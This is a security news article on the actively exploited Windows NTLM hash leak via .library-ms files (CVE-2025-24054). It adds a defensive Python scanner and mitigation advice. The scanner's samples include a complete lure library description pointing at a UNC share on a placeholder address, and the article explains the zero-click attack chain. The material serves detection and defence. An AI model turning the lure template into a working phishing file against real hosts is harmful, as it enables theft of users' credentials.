Windows NTLM Hash Leak Bug Actively Exploited in Government-Targeted Phishing Campaigns

A Windows flaw (CVE-2025-24054) allowing NTLM hash leakage through .library-ms files is now being actively used in phishing attacks against government agencies and private companies.

Although Microsoft assessed the bug as "Exploitation Less Likely", Check Point researchers observed real-world abuse within about a week of the fix Microsoft shipped in its March 2025 (11 March) update.

The attacks start with phishing emails carrying Dropbox links to a .library-ms file, an XML library description that Windows Explorer renders as a folder view. When Explorer resolves the location entries inside the file, which happens on a single click, a right-click, or merely browsing the folder that holds the file, it follows the embedded UNC path to an attacker-controlled SMB server, and Windows automatically authenticates to that server, sending the user's NTLMv2 challenge-response (the "hash" that capture tools collect).

These campaigns require minimal user interaction, making them especially dangerous.

In later waves the attackers dropped the ZIP archive and sent the .library-ms file on its own, showing that merely downloading the file and letting Explorer render it, without opening it, was enough to trigger the leak.
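The scanner below is an added example, not code from the article or from Check Point. It parses the XML that a .library-ms file contains and flags every `<simpleLocation><url>` that points off-host (a UNC path such as `\\host\share`, or an http/smb/file URL with a remote host), because that is precisely the location Explorer resolves, and authenticates to, when it renders the library. The two library descriptions embedded in it are constructed samples; the address 203.0.113.5 is a documentation range, not an indicator from the campaign.

```python
"""Flag .library-ms files whose locations point at a remote host.

Added example (not code from the article or from Check Point).  A
.library-ms file is an XML library description in the namespace
http://schemas.microsoft.com/windows/2009/library; Explorer resolves
each <simpleLocation><url> when it renders the library, and a UNC or
network URL makes it authenticate to that host over SMB.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

LIB_NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

_UNC_RE = re.compile(r"^\\\\[^\\]+")          # \\host or \\host\share
_DRIVE_RE = re.compile(r"^[a-z]:\\", re.I)    # C:\...
_REMOTE_SCHEMES = {"http", "https", "smb", "webdav"}


def library_locations(xml_doc) -> list[str]:
    """Return every <simpleLocation><url> value in document order."""
    if isinstance(xml_doc, str):
        xml_doc = xml_doc.encode("utf-8")
    root = ET.fromstring(xml_doc)
    return [
        (node.text or "").strip()
        for node in root.iterfind(".//lib:simpleLocation/lib:url", LIB_NS)
    ]


def is_remote_location(url: str) -> bool:
    """True if resolving this location would contact another host."""
    if _UNC_RE.match(url):
        return True
    low = url.lower()
    if low.startswith(("knownfolder:", "shell:")) or _DRIVE_RE.match(url):
        return False
    parsed = urlparse(url)
    if parsed.scheme in _REMOTE_SCHEMES:
        return True
    if parsed.scheme == "file":
        # file:///C:/... stays local; file://host/share is an SMB fetch.
        return parsed.netloc.lower() not in ("", "localhost")
    return False


def scan_library(xml_doc) -> dict[str, list[str]]:
    """Split a library's locations into local ones and ones that leave the host."""
    verdict: dict[str, list[str]] = {"local": [], "remote": []}
    for loc in library_locations(xml_doc):
        verdict["remote" if is_remote_location(loc) else "local"].append(loc)
    return verdict


# Constructed samples: a stock Documents library and a lure whose only
# location is a share on 203.0.113.5 (a documentation address, not a
# campaign indicator).
_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

BENIGN_LIBRARY = _TEMPLATE.format(url="knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")
LURE_LIBRARY = _TEMPLATE.format(url=r"\\203.0.113.5\share")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_LIBRARY), ("lure", LURE_LIBRARY)):
        print(label, scan_library(doc))
```

Run it over a mail gateway's quarantined attachments or a user's Downloads folder; any file with a non-empty `remote` list is worth blocking before Explorer ever gets to render it, since the leak needs no double-click.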

The flaw carries only a "medium" severity rating, yet a captured NTLMv2 response can be cracked offline or relayed to services that do not enforce signing, giving an attacker a foothold for lateral movement and privilege escalation. The recommended measures are to apply the March 2025 update immediately, disable NTLM where possible or at least restrict outgoing NTLM authentication to remote servers via Group Policy, and block outbound SMB (TCP 445) at the network edge so the authentication attempt never reaches the attacker's server.
